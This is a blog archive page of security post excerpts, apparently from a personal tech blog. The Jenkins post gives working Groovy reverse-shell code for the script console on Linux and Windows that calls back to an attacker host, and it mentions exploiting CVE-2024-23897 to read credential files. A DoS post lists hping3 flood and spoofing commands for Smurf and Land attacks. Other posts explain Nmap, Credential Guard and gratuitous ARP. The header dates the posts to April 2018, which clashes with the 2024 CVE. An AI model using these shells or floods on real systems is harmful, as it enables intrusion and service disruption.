Skip to main content

Posts

Showing posts from April, 2018

Exploiting Jenkins + CVE-2024-23897

Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()   For Windows,   String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea

DoS Attacks : Smurf,Fraggle,Land

Smurf attack. Smurf is a DoS attacking method. In this flood attack, it floods the victim with the ICMP echo packets instead of TCP SYN packets. Also, it is a spoofed broadcast ping request using the victim IP address as the Source IP. Most of the modern devices can deter these kind of attacks and SMURF is rarely a threat today. #hping3 -1 --flood --spoof <target> <broadcast_address> Fraggle attack. Similar to Smurf attack, but instead of using ICMP, Fraggle uses UDP packets over UDP ports 7 and 19. Also will broadcast a UDP packet using spoofed IP address of the victim. All the devices on the network will then respond to the victim similar to the Smurf attack. Land attack In this, the attacker sends spoofed SYN packets to the victim using the Victim's IP address and both source and destination IP. This results in the system constantly replying to itself can  crash the system. #hping3 -c <packet_count> -s <src_port> -d <dst_port> --floo

Nmap : Basic overview on Scanning Techniques

Nmap. One of the top scanning tool used in Cyber/Networking. There are plenty of scanning techniques that can be used in Nmap. This post is intended to provide a the basic overview on NMap scanning techniques. 1) Ping Scan [-sP] This types of scan is used to detect which computers or devices are online, rather than which ports are open.In this, NMap sends an ICMP ECHO REQUEST packet to the destination system. If an ICMP ECHO REPLY is received, the system is considered as up, and ICMP packets are not blocked.If there is no response to the ICMP ping request, Nmap will try a "TCP Ping", to determine whether ICMP is blocked, or if the host is really not online. A TCP Ping sends either a SYN or an ACK packet to any port (80 is the default) on the remote system. If RST, or a SYN/ACK, is returned, then the remote system is online. If the remote system does not respond, either it is offline, or the chosen port is filtered, and hence it won't be responding to anything.

Why you should not believe in Online Reviews and Social networking sites?

Most of us, before buying a product from Amazon/Flipkart, or before booking a movie ticket, we might go through the review section to see what others think about it, how good it is?, what are the pros and cons? etc. Let me tell you a fact. Though there are genuine reviews written by genuine customers/users, majority of the reviews are paid reviews. Similarly paid opinions can be seen in forums like Quora, Yahoo Answers.When it comes to social networking websites, there are big companies working for corporate, political parties, ideological institutions. Many of us are addicted to these social networking sites and we like and share things which we are not sure about. All want to monetize their profit and for that they will do even the worst methods to make things viral.These institutions pay millions of money to distribute and publicize their propaganda. In short, to brainwash the audience. When thousands write a good review of a bad product, that product automatically become

Microsoft Windows Server 2016 Virtualization Based Security and Credential Guard

Virtualization Based Security is a major Microsoft windows feature released with Windows Server 2016 and Windows 10 Operating System.Credential Guard Feature is available with Windows Server 2016 and Windows 10 Operating Systems to prevent the memory read attempt or in other words protect the Domain Credentials (Kerberos and NTLM) thus Preventing Pass the Hash Attacks (Credential Theft Attack) Credential Guard leverages Virtual Secure Mode (VSM) feature of Virtualization Based Security (VBS) to create Isolate User Modes to process the Codes preventing it from being stolen.The device guard feature also rely on the Virtualization based Security (VBS) Pass the Hash is a fundamental function of Windows for remote administration which will be taken care by the LSASS process (User Mode Process responsible for Authentication and Isolation of users).LSASS is a User Mode Process manages the hash that needs to be passed for remote administration. Upon Enabling Credential Guard, the Local

What is a Gratuitous ARP? How is it used in Network attacks?

Many of us encountered the word "Gratuitous" while exploring the network topic on ARP, The Address Resolution Protocol. Before explaining Gratuitous ARP, here is a quick review on how ARP works. ARP provides IP communication within a Layer 2 broadcast domain by mapping an IP address to a MAC address.For example, Host B wants to send information to Host A but does not have the MAC address of Host A in its ARP cache. Host B shoots a broadcast message for all hosts within the broadcast domain to obtain the MAC address associated with the IP address of Host A. All hosts within the same broadcast domain receive the ARP request, and Host A responds with its MAC address. We can see the ARP entries on our computers by entering the command arp -a . So, back to the topic on what is a Gratuitous reply, here is a better explanation. Gratuitous arp is when a device will send an ARP packet that is not a response to a request. Ideally a gratuitous ARP request is an ARP request packe

Is the Employee Data as Important as Customer data?

Hi guys, There is this Organization, that boasts about standards and policies. Yes, though these things are inevitable for the reputation of the company and data security, it actually matters only if it really implemented in practice. I have seen many organizations, that creates policies only for the Audit/Compliance sake.  Do you have a policy on data security? YES Do you have a data security policy implemented in practice? hmmmm!!!. Companies might be certified and meeting the regulatory standards but nothing has actually in practice.  Let me share with you an incident.I accidentally discovered this thing in a normal google search. I searched something and i found an interesting result. Out of curiosity, i clicked on that particular Google search result and it took me to that Company's Employee directory. The Whole directory. I can search any Employee , i can see their Employee code, department and location. If you want to know how big the list is? Yes, a few t